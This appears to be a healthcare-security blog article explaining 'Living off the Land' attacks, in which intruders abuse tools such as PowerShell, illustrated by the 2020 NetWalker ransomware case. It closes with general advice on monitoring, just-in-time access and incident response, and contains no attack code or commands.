Cybercriminals use legitimate system administration tools and built-in operating system features to conduct attacks, a technique known as "Living off the Land." According to the Health Sector Cybersecurity Coordination Center (HC3) LOTL attacks are cyberattacks where intruders use legitimate software and functions already available in the system to perform malicious actions, rather than introducing new malware.
This approach helps attackers evade detection by blending malicious activities with normal system operations, making it particularly challenging for healthcare organizations to identify and prevent these threats.
Traditional security measures focus on identifying and blocking malicious software. However, modern attackers have adapted by using trusted system tools like PowerShell, Metasploit Framework, Mimikatz, Nmap, CobaltStrike, and Wireshark to carry out attacks. These tools, necessary for system administration, become powerful weapons in the hands of skilled attackers.
According to the HC3 document, attackers leverage this cross-platform task automation solution to bypass traditional security measures and execute malicious code. What makes PowerShell-based attacks particularly dangerous is their ability to operate under the guise of legitimate administrative activities. Attackers can use PowerShell scripts to steal credentials, download additional malware, and spread throughout a network, all while evading traditional antivirus detection. This evasion becomes even more effective when attackers gain administrative privileges, as their malicious activities become virtually indistinguishable from routine system administration tasks. The tool's versatility—running on Windows, Linux, and macOS—combined with its powerful scripting capabilities, makes it an ideal choice for attackers seeking to maintain persistent access while appearing legitimate.
Healthcare organizations face particular challenges with LOTL attacks due to their complex and decentralized environments with numerous interconnected systems. Due to limited resources and budget constraints, many healthcare organizations rely on outdated software, as it is difficult and costly to keep up with constant updates and patches required to secure their systems effectively. The increasing digitization and interconnectivity of medical devices brings new avenues for attack, further increasing the risk to healthcare systems. A real-world example occurred in 2020, when a ransomware group known as NetWalker utilized LOTL to target a California healthcare institute, encrypting critical files and demanding a ransom payment. The attack disrupted the healthcare entity's medical services, forcing them to divert patients to other hospitals and causing delays in critical treatments.
Security teams cannot simply block administrative tools since they're required for daily operations. Instead, they must find ways to distinguish between legitimate use and malicious activity. This requires careful monitoring of how and when these tools are used, while ensuring normal IT operations can continue uninterrupted. For example, PowerShell activities during non-business hours or remote access from unexpected locations might indicate compromise.
The Cybersecurity and Infrastructure Security Agency (CISA) suggests the following identification and mitigation strategies for LOTL:
Related: What are network monitoring tools?
Organizations should immediately investigate suspicious activities, isolate affected systems, review logs for unauthorized access or unusual behavior, and engage their incident response team while maintaining comprehensive documentation.
Just-in-time access is a security approach that provides users with privileged access only when needed and for a limited time period, rather than maintaining permanent privileged access.
Common indicators include unusual PowerShell commands, off-hours administrative tool usage, unexpected network scanning activities, abnormal authentication patterns, and unauthorized access attempts to critical systems.